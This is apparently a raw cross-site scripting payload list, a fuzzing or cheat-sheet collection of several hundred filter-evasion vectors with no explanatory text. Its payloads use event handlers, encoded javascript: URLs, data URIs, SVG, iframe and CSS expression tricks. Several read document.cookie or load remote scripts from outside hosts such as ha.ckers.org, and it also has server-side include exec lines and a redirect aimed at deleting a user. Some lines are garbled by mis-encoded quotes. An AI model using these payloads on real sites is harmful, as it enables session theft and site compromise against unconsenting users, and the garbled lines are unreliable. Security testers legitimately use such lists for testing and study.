Ij48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pg==

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88, 83, 83, 32, 98, 121, 32, 72, 82))//";alert(String.fromCharCode(88, 83, 83, 32, 98, 121, 32, 72, 82))//";alert(String.fromCharCode(88, 83, 83, 32, 98, 121, 32, 72, 82))//-->">'>
<

";alert('XSS');//
<BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")>



<IMG """>">

<onmouseover="javascript:alert('XSS')">

%3Cscript%3alert(document.cookie);%3C%2Fscript%3

<meta http-equiv="accion" content="10"; url="http://google.com" />

<script>alert(123);</script>
<ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script>
<script>alert("hellox worldss");</script>
<script>alert(揦SS?</script>
<script>alert(揦SS?;</script>
<script>alert(慩SS?</script>
?<script>alert(揦SS?</script>
<script>alert(/XSS?</script>
<script>alert(/XSS/)</script>
</script><script>alert(1)</script>
? alert(1);
?alert(1);//
<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert(慩SS?>
<IMG SRC=攋avascript:alert(慩SS?;?
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=javascript:alert(慩SS?>
<img src=xss onerror=alert(1)>

<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>

<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'

<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"

<sVg><scRipt %00>alert&lpar;1&rpar; {Opera}

<img/src=`%00` onerror=this.onerror=confirm(1)

<form><isindex formaction="javascript&colon;confirm(1)"

<img src=`%00`&NewLine; onerror=alert(1)&NewLine;

<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>

<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/

"><h1/onmouseover='\u0061lert(1)'>%00

<iframe/src="data:text/html,<svg onload=alert(1)>">

<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>

<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script

<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}

<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>

<form><a href="javascript:\u0061lert(1)">X

</script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'>
<img/	
&#11; src=`~` onerror=prompt(1)>
<form><iframe 	
&#11; src="javascript:alert(1)"&#11;
	;>

<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
&#11;>X</a

http://www.google<script .com>alert(document.location)</script

<a href=[&#00;]"&#00; onmouseover=prompt(1)//">XYZ</a

<img/src=@ 
 onerror = prompt('1')

<style/onload=prompt('XSS')

<script ^__^>alert(String.fromCharCode(49))</script ^__^

</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(

&#00;</form><input type="date" onfocus="alert(1)">

<form><textarea 
 onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>

<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>

<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>

<script ~~~>alert(0%0)</script ~~~>

<style/onload=&lt;!--	&gt;
alert
&lpar;1&rpar;>

<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN

<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)

"><svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'


<blink/
 onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}

<marquee onstart='javascript:alert(1)'>^__^

<div/style="width:expression(confirm(1))">X</div> {IE7}

<iframe/%00/ src=javaSCRIPT&colon;alert(1)

//<form/action=javascript:alert&lpar;document&period;cookie&rpar;><input/type='submit'>//

/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>

//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\

</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>

<a/href="javascript:
 javascript:prompt(1)"><input type="X">

</plaintext\></|\><plaintext/onmouseover=prompt(1)

</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}

<a href="javascript&colon;\u0061l&#101%72t&lpar;1&rpar;"><button>

<div onmouseover='alert&lpar;1&rpar;'>DIV</div>

<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">

<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>

<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

<var onmouseover="prompt(1)">On Mouse Over</var>

<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>

<img src="/" =_=" title="onerror='prompt(1)'">

<%<!--'%><script>alert(1);</script -->

<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)

<iframe/onreadystatechange=alert(1)

<svg/onload=alert(1)

<input value=<><iframe/src=javascript:confirm(1)

<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>

http://www.<script>alert(1)</script .com

<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>

<svg><script ?>alert(1)

<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>

<img src=`xx:xx`onerror=alert(1)>

<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click

<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1

<a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a

<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>

<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script

<object data=javascript&colon;\u0061l&#101%72t(1)>

<script>+-+-1-+-+alert(1)</script>

<body/onload=&lt;!--&gt;&#10alert(1)>

<script itworksinallbrowsers>/*<script* */alert(1)</script

<img src ?itworksonchrome?\/onerror = alert(1)

<svg><script>//&NewLine;confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

<script x> alert(1) </script 1=2

<div/onmouseover='alert(1)'> style="x:">

<--`<img/src=` onerror=alert(1)> --!>
 <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)></script>

<div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>

"><img src=x onerror=window.open('https://www.google.com/');>

<form><button formaction=javascript&colon;alert(1)>CLICKME

<math><a xlink:href="//jsfiddle.net/t846h/">click

<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>

<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
?alert(String.fromCharCode(88,83,83))//?alert(String.fromCharCode(88,83,83))//?alert(String.fromCharCode(88,83,83))//?alert(String.fromCharCode(88,83,83))//?</SCRIPT>??<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<IMG 摂?<SCRIPT>alert(揦SS?</SCRIPT>?
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=攋av ascript:alert(慩SS?;?
<IMG SRC=攋av	ascript:alert(慩SS?;?
<<SCRIPT>alert(揦SS?;//<</SCRIPT>
%253cscript%253ealert(1)%253c/script%253e
?<s?2b攃ript>alert(document.cookie)</script>
foo<script>alert(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<BODY BACKGROUND=攋avascript:alert(慩SS??
<BODY ONLOAD=alert(慩SS?>
<INPUT TYPE=擨MAGE?SRC=攋avascript:alert(慩SS?;?
<IMG SRC=攋avascript:alert(慩SS??
<iframe src=http://ha.ckers.org/scriptlet.html <
javascript:alert("hellox worldss")
<img src="javascript:alert('XSS');">
<img src=javascript:alert(&quot;XSS&quot;)>
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
<script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
<script>alert("XSS");</script>&search=1
0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
<h1><font color=blue>hellox worldss</h1>
<BODY ONLOAD=alert('hellox worldss')>
<input onfocus=write(XSS) autofocus>
<input onblur=write(XSS) autofocus><input autofocus>
<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form><button formaction="javascript:alert(XSS)">lol
<!--<img src="--><img src=x onerror=alert(XSS)//">
<![><img src="]><img src=x onerror=alert(XSS)//">
<style><img src="</style><img src=x onerror=alert(XSS)//">
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
<? foo="><x foo='?><script>alert(1)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">
<% foo><x foo="%><script>alert(123)</script>">
<div style="font-family:'foo
;color:red;';">LOL
LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
<script>({0:#0=alert/#0#/#0#(0)})</script>
<svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
&lt;SCRIPT&gt;alert(/XSS/.source)&lt;/SCRIPT&gt;
\\";alert('XSS');//
&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt;
&lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\"&gt;
&lt;BODY BACKGROUND=\"javascript:alert('XSS')\"&gt;
&lt;BODY ONLOAD=alert('XSS')&gt;
&lt;IMG DYNSRC=\"javascript:alert('XSS')\"&gt;
&lt;IMG LOWSRC=\"javascript:alert('XSS')\"&gt;
&lt;BGSOUND SRC=\"javascript:alert('XSS');\"&gt;
&lt;BR SIZE=\"&{alert('XSS')}\"&gt;
&lt;LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"&gt;&lt;/LAYER&gt;
&lt;LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\"&gt;
&lt;LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\"&gt;
&lt;STYLE&gt;@import'http://ha.ckers.org/xss.css';&lt;/STYLE&gt;
&lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet\"&gt;
&lt;STYLE&gt;BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}&lt;/STYLE&gt;
&lt;XSS STYLE=\"behavior: url(xss.htc);\"&gt;
&lt;STYLE&gt;li {list-style-image: url(\"javascript:alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
&lt;IMG SRC='vbscript:msgbox(\"XSS\")'&gt;
&lt;IMG SRC=\"mocha:[code]\"&gt;
&lt;IMG SRC=\"livescript:[code]\"&gt;
瀞criptualert(EXSSE)?scriptu
&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"&gt;
&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt;
&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"
&lt;IFRAME SRC=\"javascript:alert('XSS');\"&gt;&lt;/IFRAME&gt;
&lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript:alert('XSS');\"&gt;&lt;/FRAMESET&gt;
&lt;TABLE BACKGROUND=\"javascript:alert('XSS')\"&gt;
&lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript:alert('XSS')\"&gt;
&lt;DIV STYLE=\"background-image: url(javascript:alert('XSS'))\"&gt;
&lt;DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\"&gt;
&lt;DIV STYLE=\"background-image: url(javascript:alert('XSS'))\"&gt;
&lt;DIV STYLE=\"width: expression(alert('XSS'));\"&gt;
&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(\"XSS\")';&lt;/STYLE&gt;
&lt;IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\"&gt;
&lt;XSS STYLE=\"xss:expression(alert('XSS'))\"&gt;
exp/*&lt;A STYLE='no\xss:noxss(\"*//*\");
xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'&gt;
&lt;STYLE TYPE=\"text/javascript\"&gt;alert('XSS');&lt;/STYLE&gt;
&lt;STYLE&gt;.XSS{background-image:url(\"javascript:alert('XSS')\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
&lt;STYLE type=\"text/css\"&gt;BODY{background:url(\"javascript:alert('XSS')\")}&lt;/STYLE&gt;
&lt;!--[if gte IE 4]&gt;
&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;
&lt;![endif]--&gt;
&lt;BASE HREF=\"javascript:alert('XSS');//\"&gt;
&lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"&gt;&lt;/OBJECT&gt;
&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert('XSS')&gt;&lt;/OBJECT&gt;
&lt;EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;
&lt;EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;
a=\"get\";
b=\"URL(\\"\";
c=\"javascript:\";
d=\"alert('XSS');\\")\";
eval(a+b+c+d);
&lt;HTML xmlns:xss&gt;&lt;?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;
&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=\"javas]]&gt;&lt;![CDATA[cript:alert('XSS');\"&gt;]]&gt;
&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
&lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript:alert('XSS')\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
&lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&gt;&lt;/SPAN&gt;
&lt;XML SRC=\"xsstest.xml\" ID=I&gt;&lt;/XML&gt;
&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
&lt;HTML&gt;&lt;BODY&gt;
&lt;?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"&gt;
&lt;?import namespace=\"t\" implementation=\"#default#time2\"&gt;
&lt;t:set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"&gt;
&lt;/BODY&gt;&lt;/HTML&gt;
&lt;SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"&gt;&lt;/SCRIPT&gt;
&lt;!--#exec cmd=\"/bin/echo '&lt;SCR'\"--&gt;&lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'\"--&gt;
&lt;? echo('&lt;SCR)';
echo('IPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;'); ?&gt;
&lt;IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\"&gt;
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
&lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\"&gt;
&lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
&lt;SCRIPT a=\"&gt;\" SRC=\"http://ha.ckers.org/xss.js\"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT =\"&gt;\" SRC=\"http://ha.ckers.org/xss.js\"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT a=\"&gt;\" '' SRC=\"http://ha.ckers.org/xss.js\"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT \"a='&gt;'\" SRC=\"http://ha.ckers.org/xss.js\"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT a=`&gt;` SRC=\"http://ha.ckers.org/xss.js\"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT a=\"&gt;'&gt;\" SRC=\"http://ha.ckers.org/xss.js\"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT&gt;document.write(\"&lt;SCRI\");&lt;/SCRIPT&gt;PT SRC=\"http://ha.ckers.org/xss.js\"&gt;&lt;/SCRIPT&gt;
&lt;A HREF=\"http://66.102.7.147/\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http://1113982867/\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http://0x42.0x0000066.0x7.0x93/\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http://0102.0146.0007.00000223/\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"htt p://6 6.000146.0x7.147/\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"//www.google.com/\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"//google\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http://ha.ckers.org@google\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http://google:ha.ckers.org\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http://google.com/\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http://www.google.com./\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"javascript:document.location='http://www.google.com/'\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http://www.gohttp://www.google.com/ogle.com/\"&gt;XSS&lt;/A&gt;
&lt;
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&lt;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
<
<
<
<
<
<
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
<
<
<
<
<
<
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
<
<
<
<
<
<
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
<
<
<
<
<
<
\x3c
\x3C
\u003c
\u003C
&lt;iframe src=http://ha.ckers.org/scriptlet.html&gt;
&lt;IMG SRC=\"javascript:alert('XSS')\"
&lt;SCRIPT SRC=//ha.ckers.org/.js&gt;
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt;B&gt;
&lt;&lt;SCRIPT&gt;alert(\"XSS\");//&lt;&lt;/SCRIPT&gt;
&lt;SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"&gt;&lt;/SCRIPT&gt;
&lt;BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")&gt;
&lt;SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"&gt;&lt;/SCRIPT&gt;
&lt;IMG SRC=\"   javascript:alert('XSS');\"&gt;
perl -e 'print \"&lt;SCR\0IPT&gt;alert(\\"XSS\\")&lt;/SCR\0IPT&gt;\";' &gt; out
perl -e 'print \"&lt;IMG SRC=java\0script:alert(\\"XSS\\")&gt;\";' &gt; out
&lt;IMG SRC=\"jav
ascript:alert('XSS');\"&gt;
&lt;IMG SRC=\"jav
ascript:alert('XSS');\"&gt;
&lt;IMG SRC=\"jav	ascript:alert('XSS');\"&gt;
&lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt;
&lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt;
&lt;IMG SRC=javascript:alert('XSS')&gt;
&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;
&lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;\"&gt;
&lt;IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`&gt;
&lt;IMG SRC=javascript:alert(&quot;XSS&quot;)&gt;
&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;
&lt;IMG SRC=javascript:alert('XSS')&gt;
&lt;IMG SRC=\"javascript:alert('XSS');\"&gt;
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
'';!--\"&lt;XSS&gt;=&{()}
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascrscriptipt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
